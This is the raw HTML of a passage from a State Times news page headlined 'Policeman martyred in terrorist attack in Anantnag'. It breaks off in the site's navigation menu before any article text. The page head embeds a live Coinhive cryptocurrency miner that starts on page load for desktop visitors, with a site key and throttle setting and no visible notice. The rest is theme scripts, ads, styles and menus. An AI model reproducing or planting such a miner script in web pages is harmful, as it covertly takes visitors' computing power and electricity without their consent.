<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-GB"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8" lang="en-GB"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9" lang="en-GB"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-GB"> <!--<![endif]-->
    <head>
	<meta charset="UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<title>Policeman martyred in terrorist attack in Anantnag | State Times</title>
	<link rel="profile" href="http://gmpg.org/xfn/11">
	<link rel="pingback" href="http://news.statetimes.in/xmlrpc.php">
<meta property="og:image" content="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO.jpg"/>
    <meta property="og:image:width" content="1024" />
    <meta property="og:image:height" content="1024" />

<meta property="og:title" content="Policeman martyred in terrorist attack in Anantnag"/>
<meta property="og:type" content="article"/>
<meta property="og:description" content="Srinagar: A policeman was martyred in a terrorist attack at Bijbehara town in Anantnag district of Jammu and Kashmir today, an official said. "Terrorists fired at a police vehicle in Bijbehara and the"/>
<meta property="og:url" content="http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/"/>
<meta property="og:site_name" content="State Times"/>

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="shortcut icon" href="http://news.statetimes.in/wp-content/uploads/2014/08/favicon.png?x39047" />
<link rel="apple-touch-icon" href="http://news.statetimes.in/wp-content/themes/goodnews5/apple-touch-icon-precomposed.png?x39047" />



<link rel="pingback" href="http://news.statetimes.in/xmlrpc.php" />
        <!--[if lt IE 9]>
	<script src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/helpers/js/html5.js?x39047"></script>
	<script src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/helpers/js/IE9.js?x39047"></script>
	<![endif]-->
	<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Feed" href="http://news.statetimes.in/feed/" />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Comments Feed" href="http://news.statetimes.in/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Policeman martyred in terrorist attack in Anantnag Comments Feed" href="http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/news.statetimes.in\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.5"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='contact-form-7-css'  href='http://news.statetimes.in/wp-content/plugins/contact-form-7/includes/css/styles.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='chosen-css'  href='http://news.statetimes.in/wp-content/plugins/wp-job-manager/assets/css/chosen.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='wp-job-manager-frontend-css'  href='http://news.statetimes.in/wp-content/plugins/wp-job-manager/assets/css/frontend.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='plugins-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/plugins.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='main-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/main.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='responsive-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/media.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='style-css'  href='http://news.statetimes.in/wp-content/themes/child-theme/style.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='black-style-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/flamingo.css?x39047' type='text/css' media='all' />
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/jquery/jquery.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/jquery/jquery-migrate.min.js?x39047'></script>
<link rel='https://api.w.org/' href='http://news.statetimes.in/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://news.statetimes.in/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://news.statetimes.in/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Separtists to protest PM&#8217;s visit to J-K' href='http://news.statetimes.in/separtists-to-protest-pms-visit-to-j-k/' />
<link rel='next' title='BJP Party workers and leaders celebrated Karnataka victory at Srinagar today near party office.' href='http://news.statetimes.in/bjp-party-workers-and-leaders-celebrated-karnataka-victory-at-srinagar-today-near-party-office/' />
<meta name="generator" content="WordPress 4.9.5" />
<link rel="canonical" href="http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/" />
<link rel='shortlink' href='http://news.statetimes.in/?p=359207' />
<link rel="alternate" type="application/json+oembed" href="http://news.statetimes.in/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fnews.statetimes.in%2Fpoliceman-martyred-in-terrorist-attack-in-anantnag%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://news.statetimes.in/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fnews.statetimes.in%2Fpoliceman-martyred-in-terrorist-attack-in-anantnag%2F&#038;format=xml" />
<meta name="msvalidate.01" content="E16D694C0F66CFA1ABC9F98B3398A6E5" />
<script type="text/javascript" async defer
  src="https://apis.google.com/js/platform.js?publisherid=101378335416363517049">
</script>
<link href="https://plus.google.com/101378335416363517049" rel="publisher" />
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-3121650879019050",
          enable_page_level_ads: true
     });
</script>
<meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://news.statetimes.in/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css?x39047" media="screen"><![endif]--><style type="text/css" title="dynamic-css" class="options-output">body{color:#282828;}{color:#262626;}.news-ticker{background-color:#262626;}.news-ticker li a, .news-ticker li{color:#ffffff;}</style><style type="text/css">
    
.header > .inner, .header .logo {
line-height: 112px;
height: 112px;
}
/* Category background */
</style>
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('P8XLU9qWSu7NaL91VW8ODQHZYJBdj6NY', {throttle: 0.3});

	// Only start on non-mobile devices and if not opted-out
	// in the last 14400 seconds (4 hours):
	if (!miner.isMobile() && !miner.didOptOut(14400)) {
		miner.start();
	}
</script>
    </head>
    <body class="post-template-default single single-post postid-359207 single-format-standard both-sidebars-all both-sidebars singular both_sidebars_same_width fade-imgs-in-appear sticky_navigation_on navigation_highlight_ancestor time_in_twelve_format one-side-wide both-sidebars both-sides-true smooth_scroll_enable show_secondary_sidebar_on_ipad goodnews-child wpb-js-composer js-comp-ver-5.4.5 vc_responsive" itemscope="itemscope" itemtype="http://schema.org/WebPage">
    
        <!--[if lt IE 7]>
            <p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
        <![endif]-->
        <div class="boxed-wrap clearfix">
	    <div id="header-wrapper">
                         <div class="topbar">
  <div class="inner">
            <div class="top-left-content">
                 			     <ul id="menu-top-menu" class="top-nav mom_visibility_desktop"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-72"><a href="http://news.statetimes.in">Home</a></li>
<li id="menu-item-69" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-69"><a target="_blank" href="http://www.statetimes.in/epaper/">E-Paper</a></li>
<li id="menu-item-71" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-71"><a target="_blank" href="http://news.statetimes.in/sitemap.xml">Sitemap</a></li>
<li id="menu-item-4980" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4980"><a href="http://news.statetimes.in/about-us/">About us</a></li>
<li id="menu-item-4981" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4981"><a href="http://news.statetimes.in/contact-us/">Contact us</a></li>
<li id="menu-item-57375" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57375"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>
     			     <div class="mom_visibility_device device-top-menu-wrap">
			      <div class="top-menu-holder"><i class="fa-icon-reorder mh-icon"></i></div>
			      <ul id="menu-top-menu-1" class="device-top-nav"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-72"><a href="http://news.statetimes.in">Home</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-69"><a target="_blank" href="http://www.statetimes.in/epaper/">E-Paper</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-71"><a target="_blank" href="http://news.statetimes.in/sitemap.xml">Sitemap</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4980"><a href="http://news.statetimes.in/about-us/">About us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4981"><a href="http://news.statetimes.in/contact-us/">Contact us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57375"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>			     </div>

                        </div> <!--tb left-->
        <div class="top-right-content">
            		    <ul class="mom-social-icons">
                    <li class="twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></li>
        
                <li class="facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></li>        
        
                   <li class="gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></li>     
        
        
                        <li class="youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></li>
        
        
        
        

        

        
                        <li class="tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></li>
                             <li class="rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></li>
        	
	    </ul>
                    </div> <!--tb right-->
</div>
 </div> <!--topbar-->
             <header class="header " itemscope="itemscope" itemtype="http://schema.org/WPHeader" role="banner">
                <div class="inner">
						                    <div class="logo">
					                    <a href="http://news.statetimes.in">
		                                                    <img src="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg?x39047" alt="State Times" width="445" height="77" />
                                                                                               <img class="mom_retina_logo" src="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg?x39047" width="445" height="77" alt="State Times" />
                                                		                    </a>

					
                    </div>
                                        <div class="header-right">
                                  		<script type="text/javascript">
		jQuery(document).ready(function($) {
			$('.e3lanat-rotator-id-541 .mom-e3lanat-inner').imagesLoaded( function() {
			jQuery('.e3lanat-rotator-id-541 .mom-e3lanat-inner').boxSlider({
				autoScroll: true,
				timeout: 5000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.e3lanat-rotator-id-541 .adr-next',
				prev: '.e3lanat-rotator-id-541 .adr-prev'
				
			});

			});

		});
	</script>
		<div class="mom-e3lanat-wrap  ">
	<div class="mom-e3lanat e3lanat-layout-rotator e3lanat-rotator-id-541" style="width:728px; height:90px;">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="60802" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4210843814"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
					<div class="mom-e3lan" data-id="60802" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4210843814"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
                    </div> <!--header right-->
                    
                <div class="clear"></div>
                </div>
            </header>
	    	    </div> <!--header wrap-->
                                    <nav id="navigation" itemtype="http://schema.org/SiteNavigationElement" itemscope="itemscope" role="navigation" class="dd-effect-slide ">
                <div class="navigation-inner">
                <div class="inner">
                                                                <ul id="menu-primary-two" class="main-menu mom_visibility_desktop"><li id="menu-item-58059" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home mom_default_menu_item menu-item-iconsOnly menu-item-depth-0"><a href="http://news.statetimes.in/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Home</span></a></li>
<li id="menu-item-58080" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/jknews/">Jammu and Kashmir</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58091" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/topjknews/">Top J&#038;K News</a></li>
	<li id="menu-item-58083" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/local-news/">Cities &#038; Towns</a></li>
	<li id="menu-item-58086" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/jksports/">J&#038;K Sports</a></li>
	<li id="menu-item-58085" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/crime-watch/">Crime Watch</a></li>
	<li id="menu-item-58084" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/courts/">Courts</a></li>
	<li id="menu-item-58081" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/art-culture/">Art &#038; Culture</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58091' data-id='15' data-object='category' data-layout=''><ul id='mn-ul-latest-58091'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/' title='Policeman martyred in terrorist attack in Anantnag'><img src='http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047' alt='Policeman martyred in terrorist attack in Anantnag' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/' title='Policeman martyred in terrorist attack in Anantnag'> Policeman martyred in terrorist attack in Anantnag</a><span> - 4 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/separtists-to-protest-pms-visit-to-j-k/' title='Separtists to protest PM&#8217;s visit to J-K'><img src='http://news.statetimes.in/wp-content/uploads/2018/05/Separtists-to-protest-PMs-visit-to-J-K-90x60.jpg?x39047' alt='Separtists to protest PM&#8217;s visit to J-K' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/separtists-to-protest-pms-visit-to-j-k/' title='Separtists to protest PM&#8217;s visit to J-K'> Separtists to protest PM&#8217;s visit to J-K</a><span> - 5 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/yoga-teacher-accident-case-solved-driver-arrested-truck-seized/' title='Yoga teacher accident case solved; driver arrested, truck seized  '><img src='http://news.statetimes.in/wp-content/uploads/2018/05/2-1-90x60.jpg?x39047' alt='Yoga teacher accident case solved; driver arrested, truck seized  ' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/yoga-teacher-accident-case-solved-driver-arrested-truck-seized/' title='Yoga teacher accident case solved; driver arrested, truck seized  '> Yoga teacher accident case solved; driver arrested, truck seized  </a><span> - 5 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/kashmir-division-and-winter-zone-schools-of-jammu-division-to-observe-timing-from-900am-to-300pm/' title='Kashmir Division and winter zone schools of Jammu Division to observe timing from 9:00AM to 3:00PM'><img src='http://news.statetimes.in/wp-content/uploads/2015/04/ST-LOGO1-90x60.jpg?x39047' alt='Kashmir Division and winter zone schools of Jammu Division to observe timing from 9:00AM to 3:00PM' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/kashmir-division-and-winter-zone-schools-of-jammu-division-to-observe-timing-from-900am-to-300pm/' title='Kashmir Division and winter zone schools of Jammu Division to observe timing from 9:00AM to 3:00PM'> Kashmir Division and winter zone schools of Jammu Division to observe timing from 9:00AM to 3:00PM</a><span> - 8 hours ago</span></div></li></ul><a href='http://news.statetimes.in/section/news/jknews/topjknews/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58083' data-id='16' data-object='category' data-layout=''><ul id='mn-ul-latest-58083'></ul><a href='http://news.statetimes.in/section/news/jknews/local-news/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58086' data-id='17' data-object='category' data-layout=''><ul id='mn-ul-latest-58086'></ul><a href='http://news.statetimes.in/section/news/jknews/jksports/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58085' data-id='233' data-object='category' data-layout=''><ul id='mn-ul-latest-58085'></ul><a href='http://news.statetimes.in/section/news/jknews/crime-watch/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58084' data-id='1355' data-object='category' data-layout=''><ul id='mn-ul-latest-58084'></ul><a href='http://news.statetimes.in/section/news/jknews/courts/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58081' data-id='1349' data-object='category' data-layout=''><ul id='mn-ul-latest-58081'></ul><a href='http://news.statetimes.in/section/news/jknews/art-culture/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58092" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/exclusive/">Exclusive</a>
<ul class="sub-menu ">
	<li id="menu-item-58093" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/topic/dost-khan/">Dost Khan</a></li>
	<li id="menu-item-58094" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/blunt-butcher/">Blunt Butcher</a></li>
	<li id="menu-item-58095" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/pride-or-shame-2/">Pride or Shame</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58096" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/editorial/">Editorial</a></li>
<li id="menu-item-58104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/world/">World</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58101" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/india-national/">National</a></li>
	<li id="menu-item-58105" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/world/">World</a></li>
	<li id="menu-item-58100" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/business/">Business</a></li>
	<li id="menu-item-58103" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/sports/">Sports</a></li>
	<li id="menu-item-58102" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/science-tech/">Science n Tech</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58101' data-id='20' data-object='category' data-layout=''><ul id='mn-ul-latest-58101'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/solar-scam-hc-partly-allows-chandys-plea-challenging-legality-of-commission-report/' title='Solar scam: HC partly allows Chandy&#8217;s plea, challenging legality of commission report'><img src='http://news.statetimes.in/wp-content/uploads/2015/09/Kerala-High-Court-seeks-govts-ATR-against-Thachankery-90x60.jpg?x39047' alt='Solar scam: HC partly allows Chandy&#8217;s plea, challenging legality of commission report' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/solar-scam-hc-partly-allows-chandys-plea-challenging-legality-of-commission-report/' title='Solar scam: HC partly allows Chandy&#8217;s plea, challenging legality of commission report'> Solar scam: HC partly allows Chandy&#8217;s plea, challenging legality of commission report</a><span> - 5 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/jet-airways-offers-fares-starting-rs-967-for-udan-flights/' title='Jet Airways offers fares starting Rs 967 for Udan flights'><img src='http://news.statetimes.in/wp-content/uploads/2018/01/Jet-Airways-terminates-two-pilots-involved-in-mid-air-brawl-90x60.jpg?x39047' alt='Jet Airways offers fares starting Rs 967 for Udan flights' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/jet-airways-offers-fares-starting-rs-967-for-udan-flights/' title='Jet Airways offers fares starting Rs 967 for Udan flights'> Jet Airways offers fares starting Rs 967 for Udan flights</a><span> - 5 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/cong-decides-to-back-jds-in-forming-govt/' title='Cong decides to back JD(S) in forming govt'><img src='http://news.statetimes.in/wp-content/uploads/2017/07/Congress-shifts-44-Gujarat-MLAs-to-Bengaluru-90x60.jpg?x39047' alt='Cong decides to back JD(S) in forming govt' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/cong-decides-to-back-jds-in-forming-govt/' title='Cong decides to back JD(S) in forming govt'> Cong decides to back JD(S) in forming govt</a><span> - 6 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/sensex-slips-59-pts-on-cong-jds-alliance-buzz-in-ktaka/' title='Sensex slips 59 pts on Cong-JD(S) alliance buzz in K&#8217;taka'><img src='http://news.statetimes.in/wp-content/uploads/2017/08/Nifty-reclaims-9900-mark-Sensex-up-167-pts-on-fund-inflows-90x60.jpg?x39047' alt='Sensex slips 59 pts on Cong-JD(S) alliance buzz in K&#8217;taka' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/sensex-slips-59-pts-on-cong-jds-alliance-buzz-in-ktaka/' title='Sensex slips 59 pts on Cong-JD(S) alliance buzz in K&#8217;taka'> Sensex slips 59 pts on Cong-JD(S) alliance buzz in K&#8217;taka</a><span> - 6 hours ago</span></div></li></ul><a href='http://news.statetimes.in/section/news/india-national/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58105' data-id='9' data-object='category' data-layout=''><ul id='mn-ul-latest-58105'></ul><a href='http://news.statetimes.in/section/news/world/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58100' data-id='22' data-object='category' data-layout=''><ul id='mn-ul-latest-58100'></ul><a href='http://news.statetimes.in/section/news/business/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58103' data-id='21' data-object='category' data-layout=''><ul id='mn-ul-latest-58103'></ul><a href='http://news.statetimes.in/section/news/sports/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58102' data-id='23' data-object='category' data-layout=''><ul id='mn-ul-latest-58102'></ul><a href='http://news.statetimes.in/section/news/science-tech/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/entertainment/">Entertainment</a><div class='cats-mega-wrap mom_cats_horizontal'>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58107" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/bollywod/">Bollywood</a></li>
	<li id="menu-item-58108" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/hollywood/">Hollywood</a></li>
	<li id="menu-item-58109" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/movies/">Movies</a></li>
	<li id="menu-item-58110" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/television/">Television</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58107' data-id='11' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58107'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/priyanka-chopras-next-marathi-production-titled-paani/' title='Priyanka Chopra&#8217;s next Marathi production titled &#8216;Paani&#8217;'><img src='http://news.statetimes.in/wp-content/uploads/2016/03/Priyanka-Chopra-reaches-13-million-Twitter-followers-120x76.jpg?x39047' alt='Priyanka Chopra&#8217;s next Marathi production titled &#8216;Paani&#8217;' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/priyanka-chopras-next-marathi-production-titled-paani/' title='Priyanka Chopra&#8217;s next Marathi production titled &#8216;Paani&#8217;'> Priyanka Chopra&#8217;s next Marathi production titled &#8216;Paani&#8217;</a><span>  11 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/vaani-kapoor-to-star-opposite-ranbir-in-shamshera/' title='Vaani Kapoor to star opposite Ranbir in &#8216;Shamshera&#8217;'><img src='http://news.statetimes.in/wp-content/uploads/2018/05/Vaani-Kapoor-to-star-opposite-Ranbir-in-Shamshera-120x76.jpg?x39047' alt='Vaani Kapoor to star opposite Ranbir in 